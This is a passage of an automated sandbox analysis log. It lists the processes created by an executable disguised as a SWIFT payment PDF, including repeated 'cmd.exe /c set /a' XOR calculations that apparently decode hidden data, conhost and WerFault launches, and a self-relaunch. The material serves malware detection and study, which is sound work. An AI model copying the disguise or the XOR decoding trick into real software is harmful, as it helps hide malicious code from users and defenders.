          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe  Process created: unknown unknown
